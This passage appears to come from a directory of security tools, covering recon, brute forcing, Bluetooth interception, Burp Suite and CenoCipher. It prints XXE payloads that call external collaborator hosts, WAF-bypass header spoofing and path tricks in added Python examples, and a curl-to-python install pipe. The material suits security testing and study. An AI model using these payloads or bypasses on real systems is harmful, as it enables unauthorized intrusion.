  • From Address: First memory address of this driver.
  • To Address: Last memory address of this driver.
  • Size: Driver size in memory.
  • Time Stamp: Time stamp of this driver.
  • Time String: Time stamp of this driver, displayed in date/time format.
  • Product Name: Product name of this driver, loaded from the version resource of the driver.
  • File Description: File description of this driver, loaded from the version resource of the driver.
  • File Version: File version of this driver, loaded from the version resource of the driver.
  • Company: Company name of this driver, loaded from the version resource of the driver.
  • Full Path: Full path of the driver filename.

Lower Pane Modes

Currently, the lower pane has 4 different display modes. You can change the display mode of the lower pane from Options->Lower Pane Mode menu.
  1. All Drivers: Displays all the drivers that were loaded during the crash that you selected in the upper pane. The drivers/modules whose memory addresses were found in the stack are marked in pink color.
  2. Only Drivers Found In Stack: Displays only the modules/drivers whose memory addresses were found in the stack of the crash. There is a very high chance that one of the drivers in this list is the one that caused the crash.
  3. Blue Screen in XP Style: Displays a blue screen that looks very similar to the one that Windows displayed during the crash.
  4. DumpChk Output: Displays the output of Microsoft DumpChk utility. This mode only works when Microsoft DumpChk is installed on your computer and BlueScreenView is configured to run it from the right folder (In the Advanced Options window). 

Command-Line Options

/LoadFrom <Source> Specifies the source to load from.
1 -> Load from a single MiniDump folder (/MiniDumpFolder parameter)
2 -> Load from all computers specified in the computer list file. (/ComputersFile parameter)
3 -> Load from a single MiniDump file (/SingleDumpFile parameter)
/MiniDumpFolder <Folder> Start BlueScreenView with the specified MiniDump folder.
/SingleDumpFile <Filename> Start BlueScreenView with the specified MiniDump file. (For using with /LoadFrom 3)
/ComputersFile <Filename> Specifies the computers list filename. (When LoadFrom = 2)
/LowerPaneMode <1 - 3> Start BlueScreenView with the specified mode. 1 = All Drivers, 2 = Only Drivers Found In Stack, 3 = Blue Screen in XP Style.
/stext <Filename> Save the list of blue screen crashes into a regular text file.
/stab <Filename> Save the list of blue screen crashes into a tab-delimited text file.
/scomma <Filename> Save the list of blue screen crashes into a comma-delimited text file (csv).
/stabular <Filename> Save the list of blue screen crashes into a tabular text file.
/shtml <Filename> Save the list of blue screen crashes into HTML file (Horizontal).
/sverhtml <Filename> Save the list of blue screen crashes into HTML file (Vertical).
/sxml <Filename> Save the list of blue screen crashes into XML file.
/sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Bug Check Code" and "Crash Time". You can specify the '~' prefix character (e.g: "~Crash Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
BlueScreenView.exe /shtml "f:\temp\crashes.html" /sort 2 /sort ~1
BlueScreenView.exe /shtml "f:\temp\crashes.html" /sort "Bug Check String" /sort "~Crash Time"
/nosort When you specify this command-line option, the list will be saved without any sorting.


Download BlueScreenView

Bluto - DNS Recon, DNS Zone Transfer, and Email Enumeration

BLUTO DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto now does email address enumeration based on the target domain, currently using the Bing and Google search engines. It is configured to use a random User-Agent on each request and does a country lookup to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas; however, excessive lookups will result in captchas (Bluto will warn you if any are identified).

Bluto requires various other dependencies. So to make things as easy as possible, pip is used for the installation. This does mean you will need to have pip installed prior to attempting the Bluto install.

Pip Install Instructions
Note: To test if pip is already installed execute.
  pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.
  curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions
(1) Once pip has successfully downloaded and installed, we can install Bluto:
  sudo pip install git+git://github.com/RandomStorm/Bluto

(2) You should now be able to execute 'bluto' from any working directory in any terminal.
  bluto

Upgrade Instructions
(1) The upgrade process is as simple as:
  sudo pip install git+git://github.com/RandomStorm/Bluto --upgrade


Download Bluto

Bohatei - Flexible and Elastic DDoS Defense


Bohatei is a first of its kind platform that enables flexible and elastic DDoS defense using SDN and NFV.

The repository contains a first version of the components described in the Bohatei paper, as well as a web-based User Interface. The backend folder consists of :
  • an implementation of the FlowTags framework for the OpenDaylight controller
  • an implementation of the resource management algorithms
  • a topology file that was used to simulate an ISP topology
  • scripts that facilitate functions such as spawning, tearing down and retrieving the topology.
  • scripts that automate and coordinate the components required for the usecases examined.
The frontend folder contains the required files for the web interface.
For the experiments performed, we used a set of VM images that contain implementations of the strategy graphs for each type of attack (SYN Flood, UDP Flood, DNS Amplification and Elephant Flow). Those images will become available at a later stage. The tools that were used for those strategy graphs are the following:

Bohatei Paper
Bohatei Slides
Video

Download Bohatei

BruteX - Automatically Brute Force all Services Running on a Target


Automatically brute force all services running on a target including:
  • Open ports
  • DNS domains
  • Web files
  • Web directories
  • Usernames
  • Passwords

USAGE
./brutex target

DEPENDENCIES
  • NMap
  • Hydra
  • Wfuzz
  • SNMPWalk
  • DNSDict

To brute force multiple hosts, use brutex-massscan and include the IP's/hostnames to scan in the targets.txt file.


Download BruteX

Btproxy - Man In The Middle Analysis Tool For Bluetooth


Tested Devices
  • Pebble Steel smart watch
  • Moto 360 smart watch
  • OBDLink OBD-II Bluetooth Dongle
  • Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp (at) vt (dot) edu.

Dependencies
  • Need at least 1 Bluetooth card (either USB or internal).
  • Need to be running Linux, another *nix, or OS X.
  • BlueZ 4
For a debian system, run
sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev

Installation
sudo python setup.py install

Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.

Example
# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
Where the master is typically the phone and the slave mac address is typically the other peripheral device (smart watch, headphones, keyboard, obd2 dongle, etc).
The master is the device that sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.

How to find the BT MAC Address?
Well, you can usually look it up in the settings of a phone. The most robust way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:
hcitool scan
hcitool inq
To get a list of services on a device:
sdptool records <bt-address>

Usage
Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will lookup those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).
Then it will first try connecting to the slave device from the cloned master adaptor. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adaptor will be set to be listening for a connection from the master. At this point, the real master device should connect to the adaptor. After the master connects, the proxied connection is complete.

Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.

Advanced Usage
Manipulation of the traffic can be handled via Python by passing an inline script. Just implement the master_cb and slave_cb callback functions. These are called upon receiving data, and the returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
    """
        Received something from master, about to be sent to slave.
    """
    print '<< ', repr(req)
    # Append the raw bytes to the log; the context manager closes the file handle.
    with open('mastermessages.log', 'a+b') as log:
        log.write(req)
    # Whatever is returned here is what the slave actually receives.
    return req

def slave_cb(res):
    """
        Same as above but it's from slave about to be sent to master
    """
    print '>> ', repr(res)
    with open('slavemessages.log', 'a+b') as log:
        log.write(res)
    # Whatever is returned here is what the master actually receives.
    return res
Also see the example functions for manipulating Pebble watch traffic in replace.py
This code can be edited and reloaded during runtime by entering 'r' into the program console. This avoids the pains of reconnecting. Any errors will be caught and regular transmission will continue.

TODO
  • BLE
  • Improve the file logging of the traffic and make it more interactive for replays/manipulation.
  • Indicate which service is which in the output.
  • Provide control for disconnecting/connecting services.
  • PCAP file support
  • ncurses?

How it works
This program starts by killing the bluetoothd process, running it again with a LD_PRELOAD pointed to a wrapper for the bind system call to block bluetoothd from binding to L2CAP port 1 (SDP). All SDP traffic goes over L2CAP port 1 so this makes it easy to MiTM/forward between the two devices and we don't have to worry about mimicking the advertising.
The program first scans each device for their name and device class to make accurate clones. It will append the string '_btproxy' to each name to make them distinguishable from a user perspective. Alternatively, you can specify the names to use at the command line.
The program then scans the services of the slave device. It makes a socket connection to each service and open a listening port for the master device to connect to. Once the master connects, the Proxy/MiTM is complete and output will be sent to STDOUT.

Notes
Some bluetooth devices have different methods of pairing which makes this process more complicated. Right now it supports SPP and legacy pin pairing.
This program doesn't yet have support for Bluetooth Low Energy. A similar approach can be taken for BLE.

Errors

btproxy or bluetoothd hangs
If you are using bluez 5, you should try uninstalling and installing bluez 4 . I've had problems with bluez 5 hanging.

error accessing bluetooth device
Make sure the bluetooth adaptors are plugged in and enabled.
Run
    # See the list of all adaptors
    hciconfig -a

    # Enable
    sudo hciconfig hciX up

    # if you get this message
    Can't init device hci0: Operation not possible due to RF-kill (132)

    # Then try unblocking it with the rfkill command
    sudo rfkill unblock all

UserWarning: <path>/.python-eggs is writable by group/others
Fix
chmod g-rw,o-x <path>/.python-eggs


Download Btproxy

Burp Suite Professional 1.6.26 - The Leading Toolkit for Web Application Security Testing


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.6.26

This release adds the ability to detect blind server-side XML/SOAP injection by triggering interactions with Burp Collaborator.

Previously, Burp Scanner has detected XML/SOAP injection by submitting some XML-breaking syntax like:
]]>>

and analyzing responses for any resulting error messages.

Burp now sends payloads like:
<nzf xmlns="http://a.b/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">
nzf</nzf>
and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

Note that this type of technique is effective even when the original parameter value does not contain XML, and there is no indication within the request or response that XML/SOAP is being used on the server side.

The new scan check uses both schema location and XInclude to cause the server-side XML parser to interact with the Collaborator server.

In addition, when the original parameter value does contain XML being submitted by the client, Burp now also uses the schema location and XInclude techniques to try to induce external service interactions. (We believe that Burp is now aware of all available tricks for inducing a server-side XML parser to interact with an external network service. But we would be very happy to hear of any others that people know about.)


Download Burp Suite Professional 1.6.26

Burp Suite Professional v1.6.16 - The Leading Toolkit for Web Application Security Testing


Release Notes

v1.6.15

This release introduces a brand new feature: Burp Collaborator.

Burp Collaborator is an external service that Burp can use to help discover many kinds of vulnerabilities, and has the potential to revolutionize web security testing. In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology.
This release is officially beta due to the introduction of some new types of Scanner checks, and the reliance on a new service infrastructure. However, we have tested the new capabilities thoroughly and are not aware of any stability issues.

v1.6.16

This release fixes some issues with yesterday's beta release of the new Burp Collaborator feature, including a bug that may cause Burp to sometimes send some Collaborator-related test payloads even if the user has disabled use of the Collaborator feature.

This release is still officially beta while we monitor the Burp Collaborator capabilities for any further issues.


Burp Suite Professional v1.6.23 - The Leading Toolkit for Web Application Security Testing


Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing entity parameters. Burp now sends payloads like:

<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net">%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
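The following is an added example and not Burp's own code. It shows, end to end, how a Collaborator-style check of the kind described here (v1.6.23, external parameter entity) and in the v1.6.26 notes earlier on this page (schemaLocation and XInclude) works: every payload carries a unique token in a host name, a constructed server parses the XML, every external fetch its parser attempts lands in a list that stands in for the Collaborator DNS/HTTP log, and the scanner maps the observed hosts back to the parameter that was injected. CALLBACK_DOMAIN, the server class and the parameter names are assumptions; the Python standard library has no schema validator, so the schemaLocation payload produces no interaction against this server, which is the point of sending more than one payload shape.

```python
"""Added example (not Burp's code): out-of-band detection of server-side XML
processing with unique tokens per injection point. No real network is used."""
import secrets
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.etree import ElementInclude
from xml.parsers import expat

CALLBACK_DOMAIN = "oob.example"  # assumption: placeholder for burpcollaborator.net


def make_payloads(token):
    """The three payload shapes from the release notes. The token is the
    leftmost DNS label, so a single DNS lookup identifies the injection."""
    host = f"{token}.{CALLBACK_DOMAIN}"
    return {
        # v1.6.26: remote schema location, fetched by validating parsers
        "schemaLocation": (
            f'<nzf xmlns="http://a.b/" '
            f'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
            f'xsi:schemaLocation="http://a.b/ http://{host}/nzf.xsd">nzf</nzf>'),
        # v1.6.26: XInclude, fetched by parsers that run XInclude processing
        "xinclude": (
            f'<nzf xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include href="http://{host}/nzf.xml"/></nzf>'),
        # v1.6.23: external parameter entity in an injected DOCTYPE
        "paramEntity": (
            "<?xml version='1.0' standalone='no'?>"
            f'<!DOCTYPE foo [<!ENTITY % pe SYSTEM "http://{host}/pe.dtd">%pe; ]>'
            "<foo/>"),
    }


class ConstructedServer:
    """Stand-in target. resolve_external=True models a parser configured to
    fetch external resources (the vulnerable setting); False models one that
    refuses them. `interactions` plays the Collaborator server's log."""

    def __init__(self, resolve_external):
        self.resolve_external = resolve_external
        self.interactions = []

    def _fetch(self, url):
        if not self.resolve_external:
            raise PermissionError(f"external resource blocked: {url}")
        self.interactions.append(urlsplit(url).hostname)  # what a DNS log sees

    def handle(self, xml_text):
        # Stage 1, DTD: with parameter-entity parsing enabled, expat hands every
        # external entity reference to this handler; a real server fetches here.
        parser = expat.ParserCreate()
        parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

        def on_external_entity(context, base, system_id, public_id):
            self._fetch(system_id)
            return 1  # report the reference as handled

        parser.ExternalEntityRefHandler = on_external_entity
        parser.Parse(xml_text, True)

        # Stage 2, XInclude: ElementInclude calls the loader for each xi:include
        # element; a remote href means a remote fetch.
        root = ET.fromstring(xml_text)

        def loader(href, parse, encoding=None):
            self._fetch(href)
            return ET.Element("included") if parse == "xml" else ""

        ElementInclude.include(root, loader=loader)
        return root.tag


def scan(target, params):
    """Inject every payload into every parameter and remember which token
    belongs to which parameter. Errors from the target are ignored: in this
    check only out-of-band interactions count as evidence."""
    tokens = {}
    for name in params:
        token = secrets.token_hex(6)
        tokens[token] = name
        for payload in make_payloads(token).values():
            try:
                target.handle(payload)
            except Exception:
                pass
    return tokens


def correlate(interactions, tokens):
    """Attribute each observed host to an injection point; unknown hosts are noise."""
    hits = {}
    for host in interactions:
        token = host.split(".")[0]
        if token in tokens:
            hits.setdefault(tokens[token], []).append(host)
    return hits


if __name__ == "__main__":
    vulnerable = ConstructedServer(resolve_external=True)
    print(correlate(vulnerable.interactions, scan(vulnerable, ["q", "page"])))
    hardened = ConstructedServer(resolve_external=False)
    print(correlate(hardened.interactions, scan(hardened, ["q"])))  # {}
```

Against the vulnerable server each parameter produces two interactions (the parameter entity and the XInclude); against the hardened one, none, even though both return errors for the same payloads. That is why the check reports on interactions and not on responses: the response tells you nothing reliable about whether XML was processed.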

The release also fixes some issues:

  • Some bugs affecting the saving and restoring of Burp state files.
  • A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.

Download Burp Suite Professional v1.6.23

Burpkit - Next-Gen Burpsuite Penetration Testing Tool


Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements
BurpKit has the following system requirements:
  • Oracle JDK >=8u50 and <9
  • At least 4GB of RAM

Installation
Installing BurpKit is simple:
  1. Download the latest prebuilt release from the GitHub releases page.
  2. Open BurpSuite and navigate to the Extender tab.
  3. Under Burp Extensions click the Add button.
  4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file... button under Extension Details.
  5. Select the BurpKit-<version>.jar file and click Next when done.
If all goes well, you will see three additional top-level tabs appear in BurpSuite:
  1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
  2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
  3. Jython : an integrated python interpreter console and lightweight script text editor.

BurpScript
BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:
  1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
  2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.
Take a look at the examples folder for more information.

More Information?
A readable version of the docs can be found here.


Download Burpkit

BWA - OWASP Broken Web Applications Project


A collection of vulnerable web applications that is distributed on a Virtual Machine.

Description

The Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:
  • learning about web application security
  • testing manual assessment techniques
  • testing automated tools
  • testing source code analysis tools
  • observing web attacks
  • testing WAFs and similar code technologies

All the while sparing people who want to learn or test the pain of having to compile, configure and catalog everything normally involved in doing this from scratch.


Download OWASP Broken Web Applications Project

BypassWAF - Burp Plugin to Bypass Some WAF Devices


Add headers to all Burp requests to bypass some WAF products. This extension will automatically add the following headers to all requests.
  X-Originating-IP: 127.0.0.1
  X-Forwarded-For: 127.0.0.1
  X-Remote-IP: 127.0.0.1
  X-Remote-Addr: 127.0.0.1

Usage

Steps include:
  1. Add extension to burp
  2. Create a session handling rule in Burp that invokes this extension
  3. Modify the scope to include applicable tools and URLs
  4. Configure the bypass options on the "Bypass WAF" tab
  5. Test away
Read more here.

Features

All of the features are based on Jason Haddix's work found here, and Ivan Ristic's WAF bypass work found here and here.

Bypass WAF contains the following features:
  1. Users can modify the X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr headers sent in each request. This is probably the top bypass technique in the tool. It isn't unusual for a WAF to be configured to trust itself (127.0.0.1) or an upstream proxy device, which is what this bypass targets.
  2. The "Content-Type" header can remain unchanged in each request, be removed from all requests, or be modified to one of many other options for each request. Some WAFs will only decode/evaluate requests based on known content types; this feature targets that weakness.
  3. The "Host" header can also be modified. Poorly configured WAFs might be configured to only evaluate requests based on the correct FQDN of the host found in this header, which is what this bypass targets.
  4. The request type option allows the Burp user to only use the remaining bypass techniques on the given request method of "GET" or "POST", or to apply them on all requests.
  5. The path injection feature can leave a request unmodified, inject random path info (/path/to/example.php/randomvalue?restofquery), or inject a random path parameter (/path/to/example.php;randomparam=randomvalue?restofquery). This can be used to bypass poorly written rules that rely on path information.
  6. The path obfuscation feature modifies the last forward slash in the path to a random value, or by default does nothing. The last slash can be modified to one of many values that in many cases results in a still valid request but can bypass poorly written WAF rules that rely on path information.
  7. The parameter obfuscation feature is language specific. PHP will discard a + at the beginning of each parameter, but a poorly written WAF rule might be written for specific parameter names, thus ignoring parameters with a + at the beginning. Similarly, ASP discards a % at the beginning of each parameter.
  8. The "Set Configuration" button activates all the settings that you have chosen.
All of these features can be combined to provide multiple bypass options.
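The following is an added example, not the Bypass WAF plugin's own code. It writes the request mutations from the feature list above out as plain functions (spoofed source headers, path-info and path-parameter injection, parameter-name prefixing), and then shows the server-side mistake that feature 1 relies on next to the address lookup that closes it. Hosts, paths, addresses and function names are constructed for the example.

```python
"""Added example (not the plugin's code): Bypass WAF's request mutations as
functions, plus the X-Forwarded-For trust mistake they exploit."""
import secrets
from urllib.parse import parse_qsl, quote, urlsplit, urlunsplit

SPOOF_HEADERS = ("X-Originating-IP", "X-Forwarded-For", "X-Remote-IP", "X-Remote-Addr")


def add_spoof_headers(headers, ip="127.0.0.1"):
    """Feature 1: claim to be the WAF host or an upstream proxy it trusts."""
    out = dict(headers)
    for name in SPOOF_HEADERS:
        out[name] = ip
    return out


def inject_path_info(url, value=None):
    """Feature 5: /path/to/example.php?q -> /path/to/example.php/<random>?q"""
    parts = urlsplit(url)
    extra = value if value is not None else secrets.token_hex(4)
    return urlunsplit(parts._replace(path=parts.path + "/" + extra))


def inject_path_param(url, name=None, value=None):
    """Feature 5: /path/to/example.php?q -> /path/to/example.php;<name>=<value>?q"""
    parts = urlsplit(url)
    name = name if name is not None else secrets.token_hex(3)
    value = value if value is not None else secrets.token_hex(4)
    return urlunsplit(parts._replace(path=f"{parts.path};{name}={value}"))


def obfuscate_params(url, language):
    """Feature 7: prefix every parameter name with a character the back end
    drops ('+' for PHP, '%' for ASP) but a name-matching WAF rule does not
    expect. The query is rebuilt by hand so the prefix is sent raw."""
    prefix = {"php": "+", "asp": "%"}[language]
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    query = "&".join(f"{prefix}{quote(k)}={quote(v)}" for k, v in pairs)
    return urlunsplit(parts._replace(query=query))


# Defender's side: why the header trick works, and how to make it stop working.

def naive_client_ip(headers, remote_addr):
    """The mistake: believing whatever the client put in X-Forwarded-For."""
    return headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()


def client_ip(headers, remote_addr, trusted_proxies=frozenset()):
    """Walk the chain from the TCP peer backwards and stop at the first address
    that is not one of our own proxies. Client-supplied entries are only ever
    reached through a trusted proxy, and only what that proxy appended counts."""
    chain = [a.strip() for a in headers.get("X-Forwarded-For", "").split(",") if a.strip()]
    chain.append(remote_addr)
    for addr in reversed(chain):
        if addr not in trusted_proxies:
            return addr
    return remote_addr  # every hop was ours: fall back to the peer


def waf_skips_inspection(headers, remote_addr, ip_of):
    """A rule of the form 'do not inspect traffic from the WAF host itself',
    evaluated with a given source-address lookup."""
    return ip_of(headers, remote_addr) == "127.0.0.1"
```

With the naive lookup, a request from an arbitrary address carrying the four spoofed headers is treated as coming from 127.0.0.1 and skips inspection; with the chain walk it is attributed to the TCP peer, and an entry of 127.0.0.1 placed by the client is never reached.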


Download BypassWAF

CapTipper - Malicious HTTP traffic explorer tool


CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.

CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool gives the security researcher easy access to the files and an understanding of the network flow, and is useful when researching exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.
Feeding CapTipper a drive-by traffic capture (e.g. of an exploit kit) shows the request URIs that were sent and the metadata of the responses.

The user can at this point browse to http://127.0.0.1/[URI] and receive the response back to the browser.

In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...


Download CapTipper

CenoCipher - Easy-To-Use, End-To-End Encrypted Communications Tool


CenoCipher is a free, open-source, easy-to-use tool for exchanging secure encrypted communications over the internet. It uses strong cryptography to convert messages and files into encrypted cipher-data, which can then be sent to the recipient via regular email or any other channel available, such as instant messaging or shared cloud storage.

Features at a glance

  • Simple for anyone to use. Just type a message, click Encrypt, and go
  • Handles messages and file attachments together easily
  • End-to-end encryption, performed entirely on the user's machine
  • No dependence on any specific intermediary channel. Works with any communication method available
  • Uses three strong cryptographic algorithms in combination to triple-protect data
  • Optional steganography feature for embedding encrypted data within a Jpeg image
  • No installation needed - fully portable application can be run from anywhere
  • Unencrypted data is never written to disk - unless requested by the user
  • Multiple input/output modes for convenient operation

Technical details

  • Open source, written in C++
  • AES/Rijndael, Twofish and Serpent ciphers (256-bit keysize variants), cascaded together in CTR mode for triple-encryption of messages and files
  • HMAC-SHA-256 for construction of message authentication code
  • PBKDF2-HMAC-SHA256 for derivation of separate AES, Twofish and Serpent keys from user-chosen passphrase
  • Cryptographically safe pseudo-random number generator ISAAC for production of Initialization Vectors (AES/Twofish/Serpent) and Salts (PBKDF2)
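The following is an added example and not CenoCipher's code. It shows the shape of the construction the technical details describe: PBKDF2-HMAC-SHA256 turns the passphrase into independent 256-bit keys for three CTR layers plus a MAC key, the layers are cascaded, and HMAC-SHA-256 over salt, IVs and ciphertext is verified before anything is decrypted. The Python standard library has no AES, Twofish or Serpent, so each layer's keystream is a constructed stand-in (HMAC-SHA-256 run in counter mode) that has the CTR property that matters here: the same key and IV give the same keystream, which is why every layer of every message needs a fresh IV. The round count, the salt/IV sizes and the single-derivation key split are assumptions, not CenoCipher's parameters.

```python
"""Added example (not CenoCipher's code): derive separate layer keys, cascade
three CTR layers, authenticate with HMAC-SHA-256, verify before decrypting."""
import hashlib
import hmac
import os

LAYERS = ("aes", "twofish", "serpent")  # layer names only; keystreams are stand-ins
KEY_LEN = 32                            # 256-bit keys, as in the list above
IV_LEN = 16
SALT_LEN = 16
PBKDF2_ROUNDS = 100_000                 # assumption; the page gives no count


def derive_keys(passphrase, salt):
    """One PBKDF2 run, split into three layer keys and one MAC key, so no two
    layers and the MAC ever share key material."""
    n = len(LAYERS) + 1
    material = hashlib.pbkdf2_hmac("sha256", passphrase.encode("utf-8"), salt,
                                   PBKDF2_ROUNDS, dklen=KEY_LEN * n)
    chunks = [material[i * KEY_LEN:(i + 1) * KEY_LEN] for i in range(n)]
    return dict(zip(LAYERS, chunks[:-1])), chunks[-1]


def keystream(key, iv, length):
    """Stand-in for a block cipher in CTR mode: PRF(key, iv || counter).
    Reusing (key, iv) reuses the stream, exactly as real CTR mode does."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, iv + counter.to_bytes(16, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(passphrase, plaintext):
    salt = os.urandom(SALT_LEN)
    keys, mac_key = derive_keys(passphrase, salt)
    ivs = {name: os.urandom(IV_LEN) for name in LAYERS}
    data = plaintext
    for name in LAYERS:  # cascade: each layer encrypts the previous layer's output
        data = xor_bytes(data, keystream(keys[name], ivs[name], len(data)))
    header = salt + b"".join(ivs[name] for name in LAYERS)
    tag = hmac.new(mac_key, header + data, hashlib.sha256).digest()  # encrypt-then-MAC
    return header + data + tag


def decrypt(passphrase, blob):
    header_len = SALT_LEN + IV_LEN * len(LAYERS)
    header, data, tag = blob[:header_len], blob[header_len:-32], blob[-32:]
    keys, mac_key = derive_keys(passphrase, header[:SALT_LEN])
    expected = hmac.new(mac_key, header + data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # check the tag before touching the data
        raise ValueError("authentication failed: wrong passphrase or modified data")
    iv_bytes = header[SALT_LEN:]
    ivs = {name: iv_bytes[i * IV_LEN:(i + 1) * IV_LEN] for i, name in enumerate(LAYERS)}
    for name in reversed(LAYERS):  # peel the layers off in reverse order
        data = xor_bytes(data, keystream(keys[name], ivs[name], len(data)))
    return data
```

The MAC covers the salt and the IVs as well as the ciphertext, so an attacker who flips an IV byte is caught at the tag check rather than producing garbage plaintext. The constant-time comparison matters because the tag check happens before any key-dependent work on the ciphertext.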

Version History (Change Log)

Version 4.0 (December 05, 2015)

  • Drastically overhauled and streamlined interface
  • Added multiple input/output modes for cipher-data
  • Added user control over unencrypted disk writes
  • Added auto-decrypt and open-with support
  • Added more entropy to Salt/IV generation

Version 3.0 (June 29, 2015)

  • Added Serpent algorithm for cascaded triple-encryption
  • Added steganography option for concealing data within Jpeg
  • Added conversation mode for convenience
  • Improved header obfuscation for higher security
  • Increased entropy in generation of separate salt/IVs used by ciphers
  • Many other enhancements under the hood

Version 2.1 (December 6, 2014)

  • Change cascaded encryption cipher modes from CBC to CTR for extra security
  • Improve PBKDF2 rounds determination and conveyance format
  • Fix minor bug related to Windows DPI font scaling
  • Fix minor bug affecting received filenames when saved by user

Version 2.0 (November 26, 2014)

  • Initial open-source release
  • Many enhancements to encryption algorithms and hash functions

Version 1.0 (June 10, 2014)

  • Original program release (closed source / beta)

Download CenoCipher

Cheat - Create and view interactive cheatsheets on the command-line


cheat allows you to create and view interactive cheatsheets on the command-line. It was designed to help remind *nix system administrators of options for commands that they use frequently, but not frequently enough to remember.

cheat depends only on python and pip.

Example

The next time you're forced to disarm a nuclear weapon without consulting Google, you may run:
cheat tar
You will be presented with a cheatsheet resembling:
# To extract an uncompressed archive: 
tar -xvf /path/to/foo.tar

# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz

# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/

# To extract a .bz2 archive:
tar -xjvf /path/to/foo.tar.bz2

# To create a .bz2 archive:
tar -cjvf /path/to/foo.tar.bz2 /path/to/foo/
To see what cheatsheets are available, run cheat -l.
Note that, while cheat was designed primarily for *nix system administrators, it is agnostic as to what content it stores. If you would like to use cheat to store notes on your favorite cookie recipes, feel free.

Installing

Using pip
sudo pip install cheat

Using homebrew
